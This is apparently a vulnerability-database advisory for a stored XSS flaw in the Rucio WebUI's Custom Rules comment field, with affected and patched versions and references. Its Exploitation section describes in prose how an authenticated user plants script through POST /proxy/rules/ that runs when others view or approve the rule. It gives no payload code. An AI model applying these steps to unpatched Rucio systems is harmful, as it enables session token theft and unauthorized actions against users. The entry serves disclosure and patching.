Rucio WebUI Vulnerable to Stored Cross-site Scripting (XSS) through Custom Rule Function
Description
Rucio is a software framework that provides functionality to organize, manage, and access large volumes of scientific data using customizable policies. Versions prior to 35.8.3, 38.5.4, and 39.3.1 have a stored Cross-Site Scripting (XSS) vulnerability in the Custom Rules function of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions. Versions 35.8.3, 38.5.4, and 39.3.1 fix the issue.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Rucio WebUI Custom Rules function has a stored XSS vulnerability allowing arbitrary JavaScript execution via attacker-controlled input.
Vulnerability
Rucio, a scientific data management framework, contains a stored Cross-Site Scripting (XSS) vulnerability in the Custom Rules function of its WebUI. The root cause is that attacker-controlled input, specifically in the comment field when creating a rule, is persisted by the backend without proper output encoding. When the rule is later viewed or approved, the stored script executes in the WebUI origin [2][3].
Exploitation
Exploitation
An authenticated user can inject a malicious payload into the comment field during rule creation (e.g., via POST /proxy/rules/). The payload is stored and later rendered without sanitization. The script triggers when any user views the rule (e.g., via Monitoring > Subscriptions and Rules > Show My Rules) or when an administrator approves it (Data Transfer > Approve Rules). No special privileges beyond standard authentication are required to create the malicious rule [3].
Impact
Successful exploitation allows arbitrary JavaScript execution in the context of the WebUI for any user viewing the affected page. This can lead to session token theft (if cookies lack HttpOnly flag) or unauthorized actions performed on behalf of the victim. The impact is amplified by API tokens exposed to the WebUI via JavaScript variables [3].
Mitigation
The vulnerability is fixed in Rucio versions 35.8.3, 38.5.4, and 39.3.1. Users should upgrade to these patched versions. The OWASP XSS Prevention Cheat Sheet provides general guidance on preventing such issues through proper output encoding and framework security practices [1][2].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
rucio-webuiPyPI | < 35.8.3 | 35.8.3 |
rucio-webuiPyPI | >= 36.0.0rc1, < 38.5.4 | 38.5.4 |
rucio-webuiPyPI | >= 39.0.0rc1, < 39.3.1 | 39.3.1 |
Affected products
2- rucio/ruciov5Range: < 35.8.3
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
7- github.com/advisories/GHSA-rwj9-7j48-9f7qghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2026-25733ghsaADVISORY
- cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.htmlghsax_refsource_MISCWEB
- github.com/rucio/rucio/releases/tag/35.8.3ghsax_refsource_MISCWEB
- github.com/rucio/rucio/releases/tag/38.5.4ghsax_refsource_MISCWEB
- github.com/rucio/rucio/releases/tag/39.3.1ghsax_refsource_MISCWEB
- github.com/rucio/rucio/security/advisories/GHSA-rwj9-7j48-9f7qghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.